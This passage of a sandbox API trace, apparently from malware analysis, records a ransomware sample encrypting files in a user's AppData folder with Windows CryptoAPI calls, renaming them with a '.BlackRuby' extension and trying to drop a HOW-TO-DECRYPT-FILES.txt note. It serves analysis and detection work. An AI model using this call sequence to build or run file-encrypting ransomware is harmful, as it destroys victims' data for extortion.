[0050.721] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.721] GetLastError () returned 0x0 [0050.721] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360a20) returned 1 [0050.721] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.721] GetLastError () returned 0x0 [0050.721] CryptSetKeyParam (hKey=0x360a20, dwParam=0x4, pbData=0x1c55220*=0x1, dwFlags=0x0) returned 1 [0050.721] GetLastError () returned 0x0 [0050.721] CryptSetKeyParam (hKey=0x360a20, dwParam=0x1, pbData=0x1c551ec, dwFlags=0x0) returned 1 [0050.721] GetLastError () returned 0x0 [0050.721] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c45260*, pdwDataLen=0x18ed08*=0x15480, dwBufLen=0x15480 | out: pbData=0x2c45260*, pdwDataLen=0x18ed08*=0x15480) returned 1 [0050.722] GetLastError () returned 0x0 [0050.722] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c5527c*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1c5527c*, pdwDataLen=0x18ed20*=0x10) returned 1 [0050.722] GetLastError () returned 0x0 [0050.722] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c552ac*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1c552ac*, pdwDataLen=0x18ed28*=0x10) returned 1 [0050.722] GetLastError () returned 0x0 [0050.723] CryptDestroyKey (hKey=0x360ae0) returned 1 [0050.723] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.723] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.723] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FiVMTyNK9l.wav", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FiVMTyNK9l.wav", lpFilePart=0x0) returned 0x2f [0050.723] GetLastError () returned 0x0 [0050.723] SetErrorMode (uMode=0x1) returned 0x0 [0050.725] GetFileType (hFile=0x184) returned 0x1 [0050.725] GetFileType (hFile=0x184) returned 0x1 [0050.727] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FiVMTyNK9l.wav" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\fivmtynk9l.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_dHqBJRQ1zNKZnfQoVY90qC9cZnyIc7DquqjCm.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_dhqbjrq1znkznfqovy90qc9cznyic7dquqjcm.blackruby")) returned 1 [0050.727] GetLastError () returned 0xb7 [0050.728] SetErrorMode (uMode=0x0) returned 0x1 [0050.729] GetFileType (hFile=0x184) returned 0x1 [0050.729] GetFileType (hFile=0x184) returned 0x1 [0050.729] ReadFile (in: hFile=0x184, lpBuffer=0x1c741a4, nNumberOfBytesToRead=0x79d7, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1c741a4*, lpNumberOfBytesRead=0x18ed18*=0x79d7, lpOverlapped=0x0) returned 1 [0050.730] GetLastError () returned 0x0 [0050.740] CryptImportKey (in: hProv=0x37c818, pbData=0x1cdd920, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360fa0) returned 1 [0050.740] GetLastError () returned 0x0 [0050.740] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.740] GetLastError () returned 0x0 [0050.746] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.746] GetLastError () returned 0x0 [0050.746] CryptDuplicateKey (in: hKey=0x360fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360f20) returned 1 [0050.746] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.746] GetLastError () returned 0x0 [0050.746] CryptSetKeyParam (hKey=0x360f20, dwParam=0x4, pbData=0x1d0a96c*=0x1, dwFlags=0x0) returned 1 [0050.746] GetLastError () returned 0x0 [0050.746] CryptSetKeyParam (hKey=0x360f20, dwParam=0x1, pbData=0x1d0a938, dwFlags=0x0) returned 1 [0050.746] GetLastError () returned 0x0 [0050.746] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d0a9b4*, pdwDataLen=0x18ed08*=0x7ad0, dwBufLen=0x7ad0 | out: pbData=0x1d0a9b4*, pdwDataLen=0x18ed08*=0x7ad0) returned 1 [0050.746] GetLastError () returned 0x0 [0050.746] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d19f80*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1d19f80*, pdwDataLen=0x18ed20*=0x10) returned 1 [0050.746] GetLastError () returned 0x0 [0050.746] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d19fb0*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1d19fb0*, pdwDataLen=0x18ed28*=0x10) returned 1 [0050.746] GetLastError () returned 0x0 [0050.746] CryptDestroyKey (hKey=0x360fa0) returned 1 [0050.746] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0050.746] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0050.746] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FJKmvWw_LclyHW_.mp4", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FJKmvWw_LclyHW_.mp4", lpFilePart=0x0) returned 0x34 [0050.746] GetLastError () returned 0x0 [0050.746] SetErrorMode (uMode=0x1) returned 0x0 [0050.747] GetFileType (hFile=0x184) returned 0x1 [0050.747] GetFileType (hFile=0x184) returned 0x1 [0050.749] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\FJKmvWw_LclyHW_.mp4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\fjkmvww_lclyhw_.mp4"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_jwSBOKyqQDXtvMnqiO0GSRxfWRBqaYNJgf5stjM.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_jwsbokyqqdxtvmnqio0gsrxfwrbqaynjgf5stjm.blackruby")) returned 1 [0050.749] GetLastError () returned 0xb7 [0050.754] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0050.754] GetLastError () returned 0xb7 [0050.754] SetErrorMode (uMode=0x1) returned 0x0 [0050.754] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0050.754] GetLastError () returned 0x5 [0050.756] SetErrorMode (uMode=0x0) returned 0x1 [0050.756] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\hGgiXS7K4DRbVa.mp4", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\hGgiXS7K4DRbVa.mp4", lpFilePart=0x0) returned 0x33 [0050.756] GetLastError () returned 0x5 [0050.756] SetErrorMode (uMode=0x1) returned 0x0 [0050.756] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\hGgiXS7K4DRbVa.mp4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\hggixs7k4drbva.mp4"), fInfoLevelId=0x0, lpFileInformation=0x1b4e794 | out: lpFileInformation=0x1b4e794*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcce241b0, ftCreationTime.dwHighDateTime=0x1d355e8, ftLastAccessTime.dwLowDateTime=0x19955290, ftLastAccessTime.dwHighDateTime=0x1d35328, ftLastWriteTime.dwLowDateTime=0x19955290, ftLastWriteTime.dwHighDateTime=0x1d35328, nFileSizeHigh=0x0, nFileSizeLow=0x16198)) returned 1 [0050.756] GetLastError () returned 0x5 [0050.756] SetErrorMode (uMode=0x0) returned 0x1 [0050.756] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\hGgiXS7K4DRbVa.mp4", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\hGgiXS7K4DRbVa.mp4", lpFilePart=0x0) returned 0x33 [0050.756] GetLastError () returned 0x5 [0050.756] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\hGgiXS7K4DRbVa.mp4", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\hGgiXS7K4DRbVa.mp4", lpFilePart=0x0) returned 0x33 [0050.756] GetLastError () returned 0x5 [0050.756] SetErrorMode (uMode=0x1) returned 0x0 [0050.756] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\hGgiXS7K4DRbVa.mp4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\hggixs7k4drbva.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.756] GetLastError () returned 0x0 [0050.756] GetFileType (hFile=0x184) returned 0x1 [0050.757] SetErrorMode (uMode=0x0) returned 0x1 [0050.757] GetFileType (hFile=0x184) returned 0x1 [0050.757] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x16198 [0050.757] GetLastError () returned 0x0 [0050.757] ReadFile (in: hFile=0x184, lpBuffer=0x2caf970, nNumberOfBytesToRead=0x16198, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x2caf970*, lpNumberOfBytesRead=0x18ed18*=0x16198, lpOverlapped=0x0) returned 1 [0050.758] GetLastError () returned 0x0 [0050.758] CloseHandle (hObject=0x184) returned 1 [0050.758] GetLastError () returned 0x0 [0050.759] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\hGgiXS7K4DRbVa.mp4", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\hGgiXS7K4DRbVa.mp4", lpFilePart=0x0) returned 0x33 [0050.759] GetLastError () returned 0x0 [0050.759] SetErrorMode (uMode=0x1) returned 0x0 [0050.759] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\hGgiXS7K4DRbVa.mp4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\hggixs7k4drbva.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcce241b0, ftCreationTime.dwHighDateTime=0x1d355e8, ftLastAccessTime.dwLowDateTime=0x19955290, ftLastAccessTime.dwHighDateTime=0x1d35328, ftLastWriteTime.dwLowDateTime=0x19955290, ftLastWriteTime.dwHighDateTime=0x1d35328, nFileSizeHigh=0x0, nFileSizeLow=0x16198)) returned 1 [0050.759] GetLastError () returned 0x0 [0050.759] SetErrorMode (uMode=0x0) returned 0x1 [0050.759] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c818) returned 1 [0050.760] GetLastError () returned 0x0 [0050.794] CryptImportKey (in: hProv=0x37c818, pbData=0x1baa90c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360de0) returned 1 [0050.794] GetLastError () returned 0x0 [0050.794] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.794] GetLastError () returned 0x0 [0050.799] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.799] GetLastError () returned 0x0 [0050.799] CryptDuplicateKey (in: hKey=0x360de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360da0) returned 1 [0050.799] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.799] GetLastError () returned 0x0 [0050.799] CryptSetKeyParam (hKey=0x360da0, dwParam=0x4, pbData=0x1bd7958*=0x1, dwFlags=0x0) returned 1 [0050.800] GetLastError () returned 0x0 [0050.800] CryptSetKeyParam (hKey=0x360da0, dwParam=0x1, pbData=0x1bd7924, dwFlags=0x0) returned 1 [0050.800] GetLastError () returned 0x0 [0050.800] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cdbde0*, pdwDataLen=0x18ed08*=0x16290, dwBufLen=0x16290 | out: pbData=0x2cdbde0*, pdwDataLen=0x18ed08*=0x16290) returned 1 [0050.801] GetLastError () returned 0x0 [0050.802] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bd79b4*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1bd79b4*, pdwDataLen=0x18ed20*=0x10) returned 1 [0050.802] GetLastError () returned 0x0 [0050.802] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bd79e4*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1bd79e4*, pdwDataLen=0x18ed28*=0x10) returned 1 [0050.802] GetLastError () returned 0x0 [0050.804] CryptDestroyKey (hKey=0x360de0) returned 1 [0050.804] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0050.804] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0050.804] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\hGgiXS7K4DRbVa.mp4", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\hGgiXS7K4DRbVa.mp4", lpFilePart=0x0) returned 0x33 [0050.804] GetLastError () returned 0x0 [0050.804] SetErrorMode (uMode=0x1) returned 0x0 [0050.804] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\hGgiXS7K4DRbVa.mp4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\hggixs7k4drbva.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.805] GetLastError () returned 0xb7 [0050.805] GetFileType (hFile=0x184) returned 0x1 [0050.805] SetErrorMode (uMode=0x0) returned 0x1 [0050.805] GetFileType (hFile=0x184) returned 0x1 [0050.808] CloseHandle (hObject=0x184) returned 1 [0050.808] GetLastError () returned 0xb7 [0050.808] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\hGgiXS7K4DRbVa.mp4", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\hGgiXS7K4DRbVa.mp4", lpFilePart=0x0) returned 0x33 [0050.808] GetLastError () returned 0xb7 [0050.808] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_pc6BUDWgq4jC440swE0O4fnhS7OPYzXmSUPZ23xzh.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_pc6BUDWgq4jC440swE0O4fnhS7OPYzXmSUPZ23xzh.BlackRuby", lpFilePart=0x0) returned 0x5e [0050.808] GetLastError () returned 0xb7 [0050.808] SetErrorMode (uMode=0x1) returned 0x0 [0050.808] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\hGgiXS7K4DRbVa.mp4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\hggixs7k4drbva.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcce241b0, ftCreationTime.dwHighDateTime=0x1d355e8, ftLastAccessTime.dwLowDateTime=0x19955290, ftLastAccessTime.dwHighDateTime=0x1d35328, ftLastWriteTime.dwLowDateTime=0x267c0fc0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x162a0)) returned 1 [0050.808] GetLastError () returned 0xb7 [0050.808] SetErrorMode (uMode=0x0) returned 0x1 [0050.808] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\hGgiXS7K4DRbVa.mp4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\hggixs7k4drbva.mp4"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_pc6BUDWgq4jC440swE0O4fnhS7OPYzXmSUPZ23xzh.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_pc6budwgq4jc440swe0o4fnhs7opyzxmsupz23xzh.blackruby")) returned 1 [0050.812] GetLastError () returned 0xb7 [0050.812] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0050.812] GetLastError () returned 0xb7 [0050.812] SetErrorMode (uMode=0x1) returned 0x0 [0050.812] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0050.813] GetLastError () returned 0x5 [0050.813] SetErrorMode (uMode=0x0) returned 0x1 [0050.814] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\ICnvzLp-.doc", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\ICnvzLp-.doc", lpFilePart=0x0) returned 0x2d [0050.814] GetLastError () returned 0x5 [0050.814] SetErrorMode (uMode=0x1) returned 0x0 [0050.814] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\ICnvzLp-.doc" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\icnvzlp-.doc"), fInfoLevelId=0x0, lpFileInformation=0x1bf4ccc | out: lpFileInformation=0x1bf4ccc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f650c90, ftCreationTime.dwHighDateTime=0x1d35385, ftLastAccessTime.dwLowDateTime=0x7be56890, ftLastAccessTime.dwHighDateTime=0x1d34fea, ftLastWriteTime.dwLowDateTime=0x7be56890, ftLastWriteTime.dwHighDateTime=0x1d34fea, nFileSizeHigh=0x0, nFileSizeLow=0xc290)) returned 1 [0050.814] GetLastError () returned 0x5 [0050.814] SetErrorMode (uMode=0x0) returned 0x1 [0050.814] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\ICnvzLp-.doc", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\ICnvzLp-.doc", lpFilePart=0x0) returned 0x2d [0050.814] GetLastError () returned 0x5 [0050.814] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\ICnvzLp-.doc", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\ICnvzLp-.doc", lpFilePart=0x0) returned 0x2d [0050.814] GetLastError () returned 0x5 [0050.814] SetErrorMode (uMode=0x1) returned 0x0 [0050.814] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\ICnvzLp-.doc" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\icnvzlp-.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.814] GetLastError () returned 0x0 [0050.814] GetFileType (hFile=0x184) returned 0x1 [0050.814] SetErrorMode (uMode=0x0) returned 0x1 [0050.814] GetFileType (hFile=0x184) returned 0x1 [0050.814] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0xc290 [0050.814] GetLastError () returned 0x0 [0050.815] ReadFile (in: hFile=0x184, lpBuffer=0x1bf6928, nNumberOfBytesToRead=0xc290, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1bf6928*, lpNumberOfBytesRead=0x18ed18*=0xc290, lpOverlapped=0x0) returned 1 [0050.815] GetLastError () returned 0x0 [0050.815] CloseHandle (hObject=0x184) returned 1 [0050.816] GetLastError () returned 0x0 [0050.816] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\ICnvzLp-.doc", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\ICnvzLp-.doc", lpFilePart=0x0) returned 0x2d [0050.816] GetLastError () returned 0x0 [0050.816] SetErrorMode (uMode=0x1) returned 0x0 [0050.816] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\ICnvzLp-.doc" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\icnvzlp-.doc"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f650c90, ftCreationTime.dwHighDateTime=0x1d35385, ftLastAccessTime.dwLowDateTime=0x7be56890, ftLastAccessTime.dwHighDateTime=0x1d34fea, ftLastWriteTime.dwLowDateTime=0x7be56890, ftLastWriteTime.dwHighDateTime=0x1d34fea, nFileSizeHigh=0x0, nFileSizeLow=0xc290)) returned 1 [0050.816] GetLastError () returned 0x0 [0050.816] SetErrorMode (uMode=0x0) returned 0x1 [0050.827] CryptImportKey (in: hProv=0x37c790, pbData=0x1c691ec, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x3609e0) returned 1 [0050.827] GetLastError () returned 0x0 [0050.827] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.827] GetLastError () returned 0x0 [0050.833] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.833] GetLastError () returned 0x0 [0050.833] CryptDuplicateKey (in: hKey=0x3609e0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360e20) returned 1 [0050.833] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.833] GetLastError () returned 0x0 [0050.833] CryptSetKeyParam (hKey=0x360e20, dwParam=0x4, pbData=0x1c96238*=0x1, dwFlags=0x0) returned 1 [0050.833] GetLastError () returned 0x0 [0050.833] CryptSetKeyParam (hKey=0x360e20, dwParam=0x1, pbData=0x1c96204, dwFlags=0x0) returned 1 [0050.833] GetLastError () returned 0x0 [0050.833] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c96280*, pdwDataLen=0x18ed08*=0xc390, dwBufLen=0xc390 | out: pbData=0x1c96280*, pdwDataLen=0x18ed08*=0xc390) returned 1 [0050.833] GetLastError () returned 0x0 [0050.833] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cae9cc*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1cae9cc*, pdwDataLen=0x18ed20*=0x10) returned 1 [0050.833] GetLastError () returned 0x0 [0050.834] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cae9fc*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1cae9fc*, pdwDataLen=0x18ed28*=0x10) returned 1 [0050.834] GetLastError () returned 0x0 [0050.834] CryptDestroyKey (hKey=0x3609e0) returned 1 [0050.834] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.834] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.834] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\ICnvzLp-.doc", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\ICnvzLp-.doc", lpFilePart=0x0) returned 0x2d [0050.834] GetLastError () returned 0x0 [0050.835] SetErrorMode (uMode=0x1) returned 0x0 [0050.836] GetFileType (hFile=0x184) returned 0x1 [0050.836] SetErrorMode (uMode=0x0) returned 0x1 [0050.836] GetFileType (hFile=0x184) returned 0x1 [0050.836] WriteFile (in: hFile=0x184, lpBuffer=0x1caea2c*, nNumberOfBytesToWrite=0xc3a0, lpNumberOfBytesWritten=0x18ed24, lpOverlapped=0x0 | out: lpBuffer=0x1caea2c*, lpNumberOfBytesWritten=0x18ed24*=0xc3a0, lpOverlapped=0x0) returned 1 [0050.838] GetLastError () returned 0xb7 [0050.838] CloseHandle (hObject=0x184) returned 1 [0050.838] GetLastError () returned 0xb7 [0050.838] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\ICnvzLp-.doc", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\ICnvzLp-.doc", lpFilePart=0x0) returned 0x2d [0050.838] GetLastError () returned 0xb7 [0050.838] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_JeWcXR9T6SvVp0UM1vXlVKnsyGQoIF983U0kxpjM.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_JeWcXR9T6SvVp0UM1vXlVKnsyGQoIF983U0kxpjM.BlackRuby", lpFilePart=0x0) returned 0x5d [0050.838] GetLastError () returned 0xb7 [0050.838] SetErrorMode (uMode=0x1) returned 0x0 [0050.838] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\ICnvzLp-.doc" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\icnvzlp-.doc"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f650c90, ftCreationTime.dwHighDateTime=0x1d35385, ftLastAccessTime.dwLowDateTime=0x7be56890, ftLastAccessTime.dwHighDateTime=0x1d34fea, ftLastWriteTime.dwLowDateTime=0x2680d280, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xc3a0)) returned 1 [0050.838] GetLastError () returned 0xb7 [0050.838] SetErrorMode (uMode=0x0) returned 0x1 [0050.838] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\ICnvzLp-.doc" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\icnvzlp-.doc"), 